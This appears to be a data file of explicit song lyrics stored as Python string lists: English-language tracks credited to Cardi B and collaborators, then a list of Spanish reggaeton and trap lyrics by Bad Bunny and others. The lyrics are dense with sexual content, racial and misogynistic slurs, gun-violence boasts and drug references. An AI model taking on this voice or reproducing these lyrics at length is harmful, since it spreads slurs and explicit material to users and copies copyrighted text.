bitch two options strippin' or lose used to dance in a club right across from my school i said dance not fuck don't get it confused had to set the record straight 'cause bitches love to assume mama couldn't give it to me had to get it at sue's lord only knows how i got in those shoes i was covered in dollars now i'm drippin' in jewels a bitch play with my money might as well spit in my food bitches hated my guts now they swear we was cool went from makin' tuna sandwiches to makin' the news i started speakin' my mind and tripled my views real bitch only thing fake is the boobs get money go hard you're mothafuckin' right never been a fraud in my mothafuckin' life get money go hard damn fuckin' right stunting on these bitches out of mothafuckin' spite ain't no runnin' up on me went from nothin' to glory i ain't tellin' y'all to do it i'm just tellin' my story i don't hang with these bitches 'cause these bitches be corny and i got enough bras y'all ain't gotta support me i went from rag to riches went from wic to lit nigga only person in my fam to see six figures the pressure on your shoulders feel like boulders when you gotta make sure that everybody straight bitches stab you in your back while they smilin' in your face talking crazy on your name trying not to catch a case i waited my whole life just to shit on niggas climbed to the top floor so i can spit on niggas said i was just tryna chill and make bangers bangers tell all these old bitches they in danger stop the thing on my hip whip bitches into shape brrrt that's what i call a fuckin' waist trainer you gon' run up on who and do what who i think y'all got your story screwed up yeah i came here to ball is you nuts i don't want your punkass man i'm too tough facts i'm the one that's killin' shit hands down hands down if you got a problem with me say it now say it 'cause i don't wanna hear no sneak dissin' huh 'specially not from one you weak bitches i'm on go like i don't see no stop lights skrrt i'm steppin' out every day prom night facts so if it's all love show me love then huh 'cause you hatin' on a bitch that's what it sounds like beast mode that's how i give it up nigga hoodie low that's how i'm pullin' up just 'cause i been on the road don't mean i been on the run and you gon' have to learn to hold your tongue or hold the gun brrrt woo and we all know you ain't that type no i smack you and the bitch that you act like yeah i started gettin' money bitches upset cash they remind me of my pussy bitches mad tight nails done hair laid keep 'em both laced laced cocome through shinin' with a rollie bust face shine heheadshot headshot tell 'em closed case ain't no bitch spittin' like this since '08 i don't trust no nigga i don't fear no bitch fear no bitch whole life been through some fucked up shit fucked up shit they say i'm too that oh i'm too this when you see what i've seen you end up like this woo i walked into the label where the check at where the check cardi b on the charts ain't expect that where that bitch that was claimin' she a threat where i'ma put a louboutin where her neck at they say i'm too ratchet they say i act wild i act wild wild i'm tryna whip the foreign like a bad ass child bad ass child skrrt they caught me slippin' once tell 'em try that now try that now cardi b know it's me hear that blap sound blap man i said we gon' win knock me down nine times but i get up ten look myself in the mirror i say we gon' win knock me down nine times but i get up ten look myself in the mirror i say we gon' win knock me down nine times but i get up ten yeah but i get up ten knock me down nine times but i get up ten bitch woo i'ma make a fuck nigga feel me yeah said i'ma do a broke bitch filthy ah i'ma make a fuck nigga feel me grrr said i'ma do a broke bitch filthy grrr we gon' win knock me down nine times but i get up ten woo yeah i said we gon' win knock me down nine times but i get up ten bitch grrr artist cardi b song do me dat remix featuring branson forbes lyrics explicit record label region liberty records \u2005atlantic\u2005records c genius 09 cardi\u2005b shouldn't do the ting\u2005them what you do hop on top i wanna ride i do a kegel while you switch side know mi woulda buy di world fi you call me cardi spit in my mouth look in my eyes pussy is wet come take a dive shouldn't do the ting them what you do prehook x do do me dat shouldn't do do do me dat shouldn't do me dat girl do do do me dat shouldn't do do do me dat shouldn't turn your back girl 876 work hard now my whip game was on zero i thought i was your hero but little did i know you were creeping on the low how could you do this to me right now my tank is on e girl give a hook x do do me dat shouldn't do do do me dat shouldn't do me dat girl do do do me dat shouldn't do do do me dat shouldn't turn your back girl look how far were coming from from the day mon naw have no money no have no house mon bruck and hungry you tell me seh you love but as soon as you see the bling you forget every single thing what me did do for you but now them lick you down and me don't want you now so what you gonna do what you gonna do hook x do do me dat shouldn't do do do me dat shouldn't do me dat girl do do do me dat shouldn't do do do me dat shouldn't turn your back girl brige shouldn't do the ting them what you do you know me would have buy the world for you me could've buy the close them what you want to wearme work so hard me haffi ask a question why you would have cheatwhy you would have leavewhy you would've do the ting them fi displease mewhy you would have cheatwhy you would leave me hook 4x do do me dat shouldn't do do do me dat shouldn't do me dat girl do do do me dat shouldn't do do do me dat shouldn't turn your back girl verse bx they know i rep that bitches step back i'm right back on my bullshit you\u2005can\u2005bet that wack hoes\u2005i never stress that i don't\u2005address that cardi b find me anywhere the check at these bum bitches is broke and i don't respect that lot of sugar daddy talk but they don't reflect that you ain't open up no business got no benzes i be in a mansion and you be in my mentions i came right out the trenches to top of the charts lost friends on the way this shit is breakin' my heart 'bout thirty seconds in i'm like where do i start i don't act i'm a hustler just playin' my part what you spend on your whip bitch i spend on my fit y'all let your man hit 'cause he been on my dick i'm 'bout to follow him back and send him a pic of me holdin' my grammy rubbin' my clit get that input i guarantee the outcome ass fat but i still poke it out some make your nigga play the middle like he malcolm this just a little somethin' 'til i finish up the album bitch ha suck my dick suck my dick kodak black ayy ayy you know you know why i fuck with cardi b 'cause they be thinkin' they be thinkin' both of us crazy and shit like this sound like some some some bodak orange shit or some some kodak orange shit man like ayy cardi b kodak black said lil' bitch you can't fuck with me if you wanted to ayy ayy ayy these expensive these is red bottoms these is bloody shoes woo woo woo yah yah they're bloody shoes bloody shoes hit the store i can get 'em both i don't wanna choose yah yah yah wanna choose ayy and i'm quick cut a nigga off so don't get comfortable look woo yah yah yah bih' don't get comfortable ayy ayy ayy i don't dance now i make money moves yeah bih' i make money moves ayy said i don't gotta dance i make money moves woo bih i make money moves ayy ayy ayy if i see you and i don't speak that means i don't fuck with you nigga i don't fuck with you ayy i don't fuck with you i'm a boss you a worker bitch i make bloody moves yah i make money moves verse kodak black i ain't worried 'bout her that's an old ho you thought i was comin' with my old flow kodak ain't com to take no photo i don't even pull up in a four door i just hit a lick hit the load though all my life smokin' on jojo he was just posted up with dough though now he gettin' slammed by the popo thuggish buggish ruggish shit i can't leave the streets i love this shit never gave a shit 'bout a messy bitch i ain't never take a risk for a petty lick i'm at digital heights and i'm goin' on a heist dead presidents john kennedy dead presidents pockets mount everest when i step on the scene it's a felony yeah yeah christian louboutin yeah these ain't louis vuittons huh hit a kodak bop on nae nae i wanna top me a nae nae now i'm in a white whip no mayonnaise stole a new car for me audi a8 cardi b brought the beat told me rerock the heat try me i'll do the race like i'm tayk it ain't no flockin' over here lil' buddy all of us zombies over here lil' buddy all of us robbin' 'cause they love your money got our own money but we love your money crack a nigga's head wide open like a pumpkin jaguar ftype orange like a pumpkin young nigga i got old hundreds smokin' k with my bunkie woo cardi b lil' bitch you can't fuck with me if you wanted to woo these expensive these is red bottoms these is bloody shoes woo woo hit the store i can get 'em both i don't wanna choose and i'm quick cut a nigga off so don't get comfortable look ayy woo i don't dance now i make money moves ayy ayy said i don't gotta dance i make money moves woo if i see you and i don't speak that means i don't fuck with you i'm a boss you a worker bitch i make bloody moves bloody moves bloody moves bloody moves lyrics from snippet stylin' on these hoes i'm stylin' on these hoes i be stylin' on these hoes i'm stylin' on these hoes wrist full of gold i be stylin' on these niggas stylin' on these hoes grind up a check got it at the store runnin' through the checks till the club close stylin' on these niggas stylin' on these hoes i be stylin' on these bitches stylin' on these hoes i gotta get it i need the chicken i need the bread that's why i'm workin' and i'm in the benz 'cause you in the bed bitches is sleepin' fuck is they thinkin' what is you doin' then they be mad lookin' at me like i did something to 'em uh bank account on racks pussy still on drip drop put this pussy on wax took me straight to the tip top i might race with the wraith ain't no space in the safe next bitch in my face catchin' case catchin' case but anywho anywho birkin bag jimmy choos all my bitches say eeeeooowwww all my guns go boom more guns than the warden smack hoes with my jordans pussy's floodin' new orleans kiss a bitch and i'm gorgeous never been no pussy yo i'm always with the shits i ain't never been no dirty broad but now i'm filthy rich bitch bitch stylin' on these hoes i'm stylin' on these hoes i be stylin' on these hoes i'm stylin' on these hoes wrist full of gold i be stylin' on these niggas stylin' on these hoes grind up a check got it at the store runnin' through the checks till the club close stylin' on these niggas stylin' on these hoes i be stylin' on these bitches stylin' on these hoes money money money money's all i think of i swear to god i wake up and get the green stuff you put your money on these hoes get your refund i just got my nails did i just got my weave done if you want a fly press put bardi on that shit i just bought a new gun put a body on that shit she upstairs i'ma wait in the lobby for that bitch i got my bitch and a man that can buy me all that shit you can find my fine ass bathtub with a wine glass all these hoes wanna bring me down i don't never ever mind that can you show me where your money is 'cause i know where mine's at all the energy you put in me you just tryna get the top back lately i been on some conceited shit 'cause i don't need a bitch blast off i don't feed a bitch that's how i treat a bitch in my hood i got hella stripes straight adidas shit hope she got the same energy when i see that bitch bitch stylin' on these hoes i'm stylin' on these hoes i be stylin' on these hoes i'm stylin' on these hoes wrist full of gold i be stylin' on these niggas stylin' on these hoes grind up a check got it at the store runnin' through the checks till the club close stylin' on these niggas stylin' on these hoes i be stylin' on these bitches stylin' on these hoes oh how you doin' i'm alright hahaha verse now how much times do i gotta prove these niggas wrong and how much times i gotta show these bitches i ain't soft how many shows i gotta sell out 'fore you get the cost why they really tryna front like i ain't hit the charts all these labels throwin' deals from left to right but i ain't givin' in until they get them numbers right all these people think that this shit happen overnight all that flexin' they be doin' shit is all a hype no tolerance for a hatin' bitch talkin' shit only time i hold my tongue is when i'm suckin' dick so when i see you in the streets yeah it's fuckin' lit and don't be talkin' all that sorry shit don't flip the script i see the lights i hear the hype i hit the mic i kill the show i get my dough i catch a flight i see a hater i'm runnin' down it's on sight i throw my hands i hit em' left i hit em' right they sleepin' on me just because i used to strip but it's all good 'cause now they wanna get up in my vip blowin' up my phone sayin' everythin' i touch is lit actin' corn and wanna fuck me like they wasn't talkin' shit woah i let 'em live let the shady motherfuckers live get them the price then it's time to show them what it is don't got the bat well then what you really tryna pitch don't waste my time i ain't never been no average bitch not to mention i did my tour and that shit was winnin' independent the headline award of feelin' i thank the lord for all the blessings that he is given i love the fans they fill me up with their ammunition i don't really talk shit but now i gotta off this i don't know why bitches think we work in the same office corny bitches tryna keep up look exhausted wave the white flag girl you might as well just forfeit my ex told me i was never gon' be shit lookie lookie now lookie now nigga i'm that bitch what you thought yeah you really lost now you kinda sick but i ain't never need a nigga i was always on my shit yeah i used to stare at magazines on the train lookin' at these models like i gotta be this one day fuck around got myself a name now i'm gettin' paid left the corny bitches in the grave so they throwin' shade lyrics from snippet cardi hop on top uh i wanna ride i do a kegel while it's inside spit\u2005in\u2005my mouth look\u2005in my eyes pussy is wet come\u2005take a dive tie me up like i'm surprised there's roleplay i wear a disguise i want you to park that big mack truck right in this little garage i hate when i'm using a guy and shit and they start catching feelings and\u2005like\u2005no matter what\u2005i tell them like they just\u2005don't stop liking me like i be like listen i'm a hoe i don't cook i don't clean like trust me you don't want me to be the mother of your kids i don't like motherinlaws and they just be on some sooo you don't gotta meet my mom like nigga you don't fucking get it though i dont do no sauce niggas lil bitch pop a pill i abort niggas lil bitch and i don't save them i export niggas lil bitch you niggas ass salad tossed niggas lil bitch repeat always talking about what you got so what you got always talking about you run that block nigga really what block always talking about your shooters ha so who y'all shot always talking about your foreign whips nigga really what lot always talking about y'all niggas scam okay you scam but your bank account got 0 dollars so what's the plan boy you lying using hella filters this ain't the gram boy i'm hot i use you to cool me down nigga use the fan i dont do no sauce niggas lil bitch pop a pill i abort niggas lil bitch and i don't save them i export niggas lil bitch you niggas ass salad tossed niggas lil bitch repeat some of you niggas is really too soft i do y'all like frisbees you niggas get tossed always emotional blinging my line go find nemo and nigga get lost cannot talk spicy cause you are not hot you are just sauce you bought me a chain a ring and a watch but how much it cost it's not expensive then he is a not i'm cutting him off they be like cardi why you so cold nigga i don't defrost and i mean it y'all fiending why you scheming you sauce you false won't comment i red beam him i dont do no sauce niggas lil bitch pop a pill i abort niggas lil bitch and i don't save them i export niggas lil bitch you niggas ass salad tossed niggas lil bitch repeat"]
badb10 = ["baby, yo la quiero como tú tetas hechas, culo hecho y actitud hoy te vo'a buscar, ponte la mini que hoy te lo meto en el lamborghini trépate encima de mí-í-í matamos la bellaquera tranquila, no se ve pa' afuera trépate encima de mí-í-í mami, menea ese culo como si estuviera en el tubo capsuleando y bebiendo lean úsame de trampolín trép-trépate encima y hazme venir trépate encima y hazme venir, yeh tú eres la más dura del party no le hace falta nadie con bugatti móntate en mi bicho como en un ferrari ese culo es mío, ma', yo soy tu daddy súbete encima de mi, bebé pa' que veas como te bajo baby, si yo te trabajo te llevó quien te trajo trépate encima de mí-í-í matamos la bellaquera tranquila, no se ve pa' afuera trépate encima de mí-í-í mami, menea ese culo como si estuviera en el tubo ¿qué pasó? carbon, bebé, mueve ese culo como shakira soy tu piqué me gusta como me lo mamas y te toca' a la vez no lo piense, trépate encima de una vez que tú mueres chingando conmigo en este hotel la jalo por el pelo, por el pelo las tetas y el culo le muerdo colombiana me grita, parcero a las amigas, las bajo del vuelo tranquila, compro todo nuevo siete putas a lo melo champaña, no bebo, barceló se graban chupándome el huevo chingando con miles 'e mujeres eso lo saben ustedes nos quedamos de hoteles en hoteles contando billetes de cienes chingamo' con miles 'e mujeres cambio de putas los weeken'es eso lo saben ustedes que contamo' billetes de cienes trépate encima de mí-í-í matamos la bellaquera tranquila, no se ve pa' afuera trépate encima de mí-í-í mami, menea ese culo como si estuviera en el tubo ando en miami girando con tres mamis que son modelos dos se quitaron la ropa una tiene su boca en mi huevo ya se quemaron tres blun'es codeína y un vaso con hielo estamos en un parqueadero carbon fiber contando dinero sigue bailando desnu' pasa el fuego que voy a prende'lo te subiste en mi carro pa' hacerlo tus amigas también se vinieron baby, yo la quiero como tú tetas hechas, culo hecho y actitud hoy te vo'a buscar ponte la mini que hoy te lo meto en el lamborghini trépate encima de mí-í-í matamos la bellaquera tranquila, no se ve pa' afuera trépate encima de mí-í-í mami, menea ese culo como si estuviera en el tubo lary over el conejo malo guasón, bebé dímelo, sixto bad bunny sixto rein ¿qué pasó? yo prida ez , e zeta el fucking guasón marco pulgár carbon fiber music frank miami lary over carbon fiber music carbon fiber boys tú y yo somo' exclusivos como las tokyo y las oregón bebé tú eres mi gucci, yo soy tu louis vuitton ella está hecha pa' mí, yo estoy hecho pa' ella dice que no somos famosos y se siente como estrella le pregunté si quería, me dijo que sí todo lo que tengo se lo ofrecí no creía en el amor y la convencí ella es mi beyoncé, yo su jay-z angelina y brad pitt somos lebron y d-wade en los heat nos quedamo' en el ritz y me pide que la parta como parto to' los beats aún recuerdo la primera vez que sin ropa la vi aún recuerdo la primera vez que se lo metí ella es la única que me satisface le queda cabrón todo lo que hace si peleamos rápidamente en la cama hacemos la pases con ella cada pose se siente mejor sexo salvaje cuando hacemos el amor contigo, me olvido de todo lo que hay afuera porque vivimo' en nuestra propia esfera todo rey se merece una reina y la mía eres tú contigo, me olvido de todo lo que hay afuera porque vivimo' en nuestra propia esfera todo rey se merece una reina y la mía eres tú la mía eres tú, la mía eres tú ella ordena mi vida si siento que se derrumba sus ojos no son color sol, pero a mí me alumbran eres más de lo que me merezco pide lo que sea que te obedezco siempre me distingo, restaurantes finos los domingo' los jueves pa' brava, pa' hacerle fiero a los gringos de que tengo una latina bien durota con el botty del caribe pero el glamour de europa llegamo' en la nave espacial, somos una pareja especial con baqueo de residencial, nos quedamos en la suite presidencial lo nuestro es oficial, ponte un traje corto y saca ese botty a pasear que yo me doy el guille de que soy el que lo puede acariciar contigo, me olvido de todo lo que hay afuera porque vivimo' en nuestra propia esfera todo rey se merece una reina y la mía eres tú contigo, me olvido de todo lo que hay afuera porque vivimo' en nuestra propia esfera todo rey se merece una reina y la mía eres tú yeh-yeh, yeh-yeh, yeh-yeh la calle está apagá', pero ella la va a prender porque si ella\u2005sale\u2005 to'a la'\u2005amiga' salen en la disco\u2005muy dura', no son normale' una es callá', la otra está bien loca, ey pastilla' y se besan en la boca si ella sale to'a la' amiga' salen en la disco muy dura', no son normale' una es callá', la otra está bien loca, ey pastilla' y se besan en la boca y si ella sale , ey to'a la' amiga' salen comentario' de envidiosa' no le valen no le gustan psycho ni que la acorralen je, je, uy, qué sofoque' mejor no la provoque' que se calla el que la toque a ley de na' pa' que se aloque baby, ese bumper aguanta el choque me gustan naturale' pero no se ve mal lo que se hizo pa' darle tengo permiso le metí en el 37, heh se escucha hasta en el primer piso ven y bájatelo de nuevo dale, yo te aviso , eh la nena tiene poder tranquilita, pero de nadie se deja joder , uh no se deja ver la calle está apagá', pero ella la va a prender porque si ella sale to'a la' amiga' salen en la disco muy dura', no son normale' una es callá', la otra está bien loca, ey pastilla' y se besan en la boca si ella sale to'a la' amiga' salen en la disco muy dura', no son normale' una es callá', la otra está bien loca, ey pastilla' y se besan en la boca yeh-yeh-yeh-yeh-yeh yeh-yeh-yeh-yeh yeh-yeh-yeh-yeh-yeh yeh no sé si tu boca está besando a otra en estos momentos, en estos momentos y no sé si tus ojos ya se olvidaron de mí y los pensamientos se fueron con el tiempo y me pregunto qué hubiera pasado si estuviésemos juntos, aún enamorados y me pregunto qué hubiera pasado si estuviésemos juntos, aún enamorados yeh-yeh todavía yo te espero aunque yo sé que tú no vas a volver todavía yo te quiero aunque yo sé que eso me puede joder y tengo tu foto guarda' tú y yo bailando cuando éramo' menore' de edad te digo la verda' te extraño el 14 y en la navidad y lo' polvo' en la parte posterior del carro pa' los tiempo' en la superior siempre dejaba ropa interior cada polvo mejor que el anterior pero no como el primero tú sabe' que ese no se va a borrar ahora me paso en el putero, yeh a otra persona no he podido amar y te juro que lo he trata'o pero es que ninguna se te para al la'o desde que te fuiste sigo trastorna'o escuchando masterpiece, baby, me siento down si no tengo de tu piel, down deuces de ñengo y de la, no la de chris brown el cerebro dando vuelta', lo tengo marea'o cada cual por su la'o, yeh-eh y me pregunto qué hubiera pasado si estuviésemos juntos, aún enamorados y me pregunto qué hubiera pasado si estuviésemos juntos, aún enamorados yeh yeh-yeh-yeh-yeh-yeh-yeh-yeh-yeh-eh ¡ju! okey, ey, ey ante' yo te quería, pero ya no tú me gustaba', pero ya no yo\u2005estaba\u2005pa' ti, pero\u2005ya no ey, pero ya no, ey,\u2005pero ya no ante' yo te quería, pero ya no tú me gustaba', pero ya no yo estaba pa' ti, pero ya no ey, pero ya no, ey, pero ya no conmigo ya no tiene' break, ey ya no quiero de tu amor fake, ey ya no estoy pa' ti, ya no estoy pa' ti conmigo ya no tiene' break, ey ya no quiero de tu amor fake, ey ya no estoy pa' ti, ya no estoy pa' ti ahora en toa' las rede' me sigue' sorry, mami, no me hostigue' pero como yo no se consigue tú fuera' mi j.lo, yo tu álex rodrígue' pero, ahora me gusta otra sicaria que vive por bayamón a mí ya no me cachas, yo no soy un pokémon tengo a otra que me brinca hasta que se joda el camón no quiero que me llore', no venga' con el dramón, no que ya no estamo' pa' los tiempo' de la high, ey hace rato que te dije bye gracias por el apoyo, baby, gracia' por los like' yo estoy con cinco cubana' y cuatro hookah en mokai me compré una hayabusa y no te vo' a dar una ride en verda' prefiero dárselo a tu mai' contigo no me enfango, no vo' a manchar las off-white si no te gusta, sorry, esa e' la que hay porque ante' yo te quería, pero ya no tú me gustaba', pero ya no yo estaba pa' ti, pero ya no ey, pero ya no, ey, pero ya no ¡acho, bro! a que no le dices que me amas a que no le dices que me llamas que ya debe saber que eres más mía desde ayer así que baby, dime si esta noche nos vemos que seguro lo hacemos y mañana volvemos di-di-dime, si con él eres una santa y conmigo te matas dime si esta noche nos vemo' que seguro lo hacemo' , ymañana volvemo', yeah ouh, dime, si con él eres una santa y conmigo te mata' yeh, yeh, yeh hemos peleado mil vece' como marquez y pacquiao pero la pongo en cuatro y le gano por knock-out en el instagram me tiene bloquea'o total, sabe to' lo que hago, me tiene stalkea'o buscando qué puta en foto' me ha taguea'o una guerra como tom y jerry pero por la' noche' me recibe afeitá' con el splash de cherry zapatos de marca, ya no quiere usar las sperry me chantajea pa' que le compre to' versace o burberry los domingo', condado, pikayo, después ben & jerry's pase lo que pase siempre serás mía aunque chinguemo' de noche y peleémo' to' el día dice que soy un puto y que no confía la beso por el cuello y se desvía austin, baby dime que me quieres aunque sea mentira que yo soy el único que te hace sentir viva conmigo te pones pasiva , con él siempre estás agresiva conmigo no hay discusión cada vez que yo pongo tus piernas pa' arriba y mientras tanto allí en mi habitación y esos deseos que te tengo yo así que, baby, dime si esta noche no' vemo' que seguro lo hacemo' , y mañana volvemo', yeah oh, dime, si con él eres una santa y conmigo te matas dime lo que harás esta noche dame lo que tiene', quiero hacerte to' las pose' , oh un chulito que te maltrate así nadie te lo va a hacer como te lo hago así dime dónde te espero que quiero bañarte to' en caramelo pasarte la lengua de arriba a abajo de nuevo tú sabe' que ese cuerpo fue todo mío primero tiene novio, pero le llega cuando quiero dime , si quiere' arreglamos en la cama ay, yo sé que tú también tiene' gana' y aunque yo no estoy aquí, te quiero no fue algo pasajero , pero fui el que te di primero baby, dime , si quiere' arreglamos en la cama ay, yo sé que tú también tiene' gana' y aunque yo no estoy aquí, te quiero no fue algo pasajero , pero fui el que te di primero así que, baby, dime si esta noche nos vemos que seguro lo hacemos y mañana volvemos di-di-dime, si con él eres una santa y conmigo te matas dime si esta noche nos vemos que seguro lo hacemos y mañana volvemos dime, si con él eres una santa y conmigo te matas j balvin tú tienes tu novio , yo tengo las mías recer ya me cela , cosas de la vida tú con él en la cama, pero a mí me mandas mensaje' diciendo que vaya a buscarla, pero yo mantengo de viaje sólo tenemos tiempo pa' sexo y un rato no me hables de amor , que así no me escapo, ouh pone la foto con el novio, le doy like y comentario su novio a mí me bloquea, qué raro, me pasa a diario ladrón que roba ladrón son mil año' de perdón él que no quería saber nada de mí y ella le enseñó mi nueva canción eah, por mi culpa están en pelea, dile que estoy pa' lo que sea tiene la actitud de maduro, pues, quédate con ese burro j balvin, man revol yeh, yeh, yeh, yeh austin, baby bad bunny, baby, bebé la marash hear this music mambo kingz update music dj luian dímelo, revol tiempo de balvin leggo', leggo', leggo', leggo' yeh, yeh okay, ey como phillie estoy prendío' no me apagan ni con extintor soy la obra que no\u2005hace\u2005tu pintor jeter se\u2005retiró ahora el que los mata\u2005e' lindor vamo' pa' lo' estadio' ya rompimo' lo indoor y en\u205fninguno\u205fconfío,\u205facá arriba hace\u205ffrío no me ronquen\u205fcon número' que lo' records son mío' vivo en la casa de papel, tengo mucha pasta, tío tantos hijos que no sé cómo los crío y en los dedos tengo el iceberg que rompió el titanic los mato flow sosa y quedan blancos como sammy baby, de to' colore', culito' murakami ahora me doy los shots de tequila en el grammy y eso no fui yo, eso fue la academia el conejo, la verdadera pandemia no hable' mal de mí, cabrón, que eso es blasfemia me mantengo fiel a dio' por eso e' que me premia, ey y estoy picheando, hablamo' horita ¿quiere' llegar acá? dale, ora como rita cabrón, tú no ere' franco, tampoco de vita so, tú y yo no salimo', bo, mejor evita que desde que lebron se fue ya nadie habla de los cavs tom brady, no me hacen falta los pats mi nombre e' grande se escribe con to'as en caps el mvp cabrón, lo dicen los stats y los tengo dando vuelta como la' vieja' en el parque yo no fallo, si quiero escribo con magic marker porque cuando escribo una barra no se borra en p.r. tengo el palabreo, en r.d. la cotorra ustede' son calle, yo soy música vi la lista de los billboard y tu roncaera no hace lógica yo no fuerzo, el flow e' de fábrica bajen pa'l estudio, si quieren yo les doy clínica que si no fuera por mí el género sería tan monótono sin mcgregor en el octágono la baby tuya nunca me habló de ti mientra' quemábamo' y pue' ustede' corriendo pa'l gate y yo haciendo esperar al piloto no te compare', que mi flow e' otro me pegué sin nunca jugar la loto y ahora ando arrebatao' como otto en la uru' por condado, dando ronda' como guagua 'e mantecado' bad bunny e' el diablo, mira hasta dónde ha llegado y to' lo que tengo e' porque cristo me lo ha dado, amén, ey que alce la mano el que esté libre de pecado no creo en suerte por eso no tiro dado' tú criticando y yo creando mi legado, amén ey, ey yo hago lo que me da la gana dime, paciencia jaja ey me acostumbré al sour, ya no patea me llegan a casa, no se capea solo modelos, como barea multiplicar cienes es la tarea yo soy el cacique en tu propia aldea valgo más que todo lo que te rodea no te la crea' recuerda que curry las mete , hasta que lebron lo gardea baja pa' la cuesta que ando con la orquesta, cabrón, no es la sexta yo nunca estoy abajo en las apuestas y menos en esta dile a vico que, de la recta final, estamos en el final de la recta el diablo me inyecta y saco la que suena y los acuesta ¡trra, trra! otro que se cae por la fuerza de gravedad ¡trra, trra! otro más, por si sobrevive de casualidad refuta mi tesis cabrón, y te vamos a dar catequésis no he metido un gol y tengo cristianos orándole' a messi tú ronca', cabrón, y tú no vive' así tu jeva se pasa pendiente de mí me llama pa' darle y le digo que sí yo soy un hijo 'e puta desde que nací yeh, yeh, yeh tú ronca', cabrón, y tú no vive' así tu jeva me llama y le digo que sí yo no vo'a cambiar, yo siempre he sido así sigo aquí, sigo, sigo aquí soy un hijo 'e puta desde que nací volví duro pa' meterle al beat ¿pero cómo que volví? yo no entiendo, si yo nunca me fui más duro que el bicho mío jode' conmigo y sale' partí'o tengo un pa'l de hijo', pa'l de sobrino' el que no me dice papi, me dice tío respeten lo' rango', la posición cambié la fama por admiración nunca me quedo sin munición quieren frontear, pero no tienen condición sigo mi vida, vivo cabrón siempre activo en mi maquinón salí solito del callejón y le compré una mansión a mami de un millón tengo la grasa tengo el piquete que mueve la' masa' soy fiel a mi disquera por eso to' el mundo pregunta qué pasa arcángel suena, ey-ey, por más que lo bloqueemo' arcángel llena todo' los concierto' y nosotro' no lo tenemo' yeh, yeh, yeh tú ronca', cabrón, y tú no vive' así tu jeva me llama y le digo que sí yo no vo'a cambiar, yo siempre he sido así yo soy un hijo 'e puta desde que nací tú ronca', cabrón, y tú no vive' así tu jeva se pasa pendiente de mí me llama pa' darle y le digo que sí yo soy un hijo 'e puta desde que nací hoy salimo' de noche con to' los muchacho' puesto' pa' la' insectería' estos cabrone' me roncan de palo' y nosotros dueño' de la ferretería andamo' con to' los rosario' sin saber el avemaría me roncan, me roncan, me roncan, me roncan y están como meek mill, sin batería no fallamo' un gancho hoy si meto, me la engancho no' metemo' a tu rancho y en la cara te hacemos un hueco ancho ¿que si soy maleante? cabrón, yo no sé, lo que sé es que los nervio' no existen después de do' percocet hoy no hay excusa', y si se saca, se usa si mi 40 fuera versace, en la cara te hacemos una medusa la noche es confusa y si conmigo te cruza' cabrón, te vamo' a dejar brincando como en el lollapalooza marihuana, la hooka y pastilla' la cubana, que de lejo' brilla hoy te ponemo' en capilla aunque ande' con la familia comiendo en padilla todavía no ha nacido alguien que lo haga como yo si no te pillo en p.r., te pillan los domi' en new york ah-ahmm austin, baby oh, shit bad bunny el conejo malo y yo soy el duende malvado hear this music, o sea, que nos quedó cabrón díselo, luian mambo kingz prra yeh-yeh-yeh-yeh-yeh-yeh bad bunny, baby es una loca me manda vídeos al snap mientras se toca me dice que si hoy le llego, que no puede esperar, yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeh, que la vaya a buscar, yeh es una loca me manda vídeo' al snap mientras se toca me dice que si hoy le llego, que no puede esperar , yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeh, que la vaya a buscar me tira video' por snap pidiéndome que la vaya a buscar que con él siempre termina mal y que conmigo termina mojá' nena no hay otra igual prende fuego la cama te viene' conmigo, no má' me mira cuando está atragantá' sabe', bebé, qué vamo' a hacer lo vamo' a hacer esta noche sabe', bebé, qué vamo' a hacer lo vamo' a hacer, eh, esta noche es una loca me manda vídeos al snap mientras se toca me dice que si hoy le llego, que no puede esperar, yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeh, que la vaya a buscar, yeh es una loca me manda vídeos al snap mientras se toca me dice que si hoy le llego, que no puede esperar, yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeh que la vaya a buscar, yeh hoy yo te meto un gol como agüero contigo me voy a cuero, yeh yo sé que ese culo vale dinero pero pa' mí yo lo quiero , yeh, uh es loca con la marihuana y codeína se pone bellaca y se me trepa encima ella tiene todo lo que me domina qué rico chingan las babys en argentina, uh ah, otro como yo no te lo va a hacer otra como tú no vuelve a nacer te rompo el toto y te lo mando a hacer se quita la ropa y se quedó en tacone' le gusta chingar afuera, en los balcone' si se sale, ella misma lo pone en la cama es rebelde, ella no me respeta le pido un beso y me da la combi completa chocha, culo, teta, chocha, culo, teta, yeh-eh se lo hice pa' probar ahora pide pa' llevar no te vaya' a enamorar que yo no sé na' de amar en cuatro una diosa traga y se lo goza toda una golosa la más dura desde buenos aires a mendoza es una loca, yeah me manda vídeo' a snap mientras se toca, yeah me dice que si hoy le llego, que no puede esperar, yeah que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeah, que la vaya a buscar es una loca me manda vídeo' a snap mientras se toca me dice que si hoy le llego, que no puede esperar, yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeh, que la vaya a buscar tomó una pastillita loca y puso la otra mitá' adentro 'e mi boca y yo la toco, y ella me toca no quiere a otro, y no quiero a otra ya ahora es dueña del lugar, va a tumbármelo si me pego atrás, me dice: dámelo me lo sacó 'e la boca pa' fumárselo sabe que ahora lo vamo' a pasar mejor estoy bajo 'e su poder, poder ni yo sé qué tomé, tomé no lo para 'e mover, mover creo que me enamoré, -moré yo no estoy pa' jode', -ode' y tú quieres mover, -over una más de möet, -öet entre líneas, lo sé es una loca, yeah me manda vídeo' a snap mientras se toca, yeah me dice que si hoy le llego, que no puede esperar, yeah que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeah, que la vaya a buscar me dice loca se enloquece si sólo mira y no me toca que me pasa a buscar, que no puede aguantar, que lo voy a matar que lo ate a la cama, lo agarre del cuello y no pueda respirar, -ar cazzu, baby tengo un doctorado en esto del sex de dónde salió esa puta, ¿quién es? todos se preguntan si lo hago bien yo les enseñé a todas esas bitches a mover págame, págame, págame, que este culo se lo merece y págame, págame, págame si quieres que esta noche me quede te quiero comer, yeah de saberlo mover, yeah di que te enamoré, yeah y con todos mis truco' hacerte volver, yeah me dice loca, se enloquece si no me toca que me pasa a buscar, que no puede aguantar que lo voy a matar que lo ate a la cama lo agarre del cuello y no pueda respirar, -ar es una loca eh-eh explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda explícale lo que sientes cuando estás desnuda dile que sólo 